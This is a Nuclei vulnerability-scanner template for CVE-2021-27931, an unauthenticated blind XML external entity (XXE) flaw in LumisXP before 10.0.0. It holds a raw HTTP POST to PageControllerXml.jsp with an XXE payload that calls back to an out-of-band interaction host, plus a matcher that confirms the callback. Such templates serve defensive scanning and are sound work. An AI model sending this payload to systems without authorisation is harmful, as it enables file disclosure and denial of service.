nuclei-templates/cves/2021/CVE-2021-27931.yaml

40 lines
1.2 KiB
YAML

id: CVE-2021-27931
info:
name: LumisXP <10.0.0 - Blind XML External Entity Attack
author: alph4byt3
severity: critical
description: LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XML external entity (XXE) attacks via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service.
reference:
- https://github.com/sl4cky/LumisXP-XXE---POC/blob/main/poc.txt
- https://nvd.nist.gov/vuln/detail/CVE-2021-27931
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
cvss-score: 9.1
cve-id: CVE-2021-27931
cwe-id: CWE-611
tags: cve,cve2021,lumis,xxe,oast,blind
requests:
- raw:
- |
POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1
Host: {{Hostname}}
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY xxe SYSTEM "http://{{interactsh-url}}">
]>
<method name="addPage">
<id>&xxe;</id>
</method>
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/05/17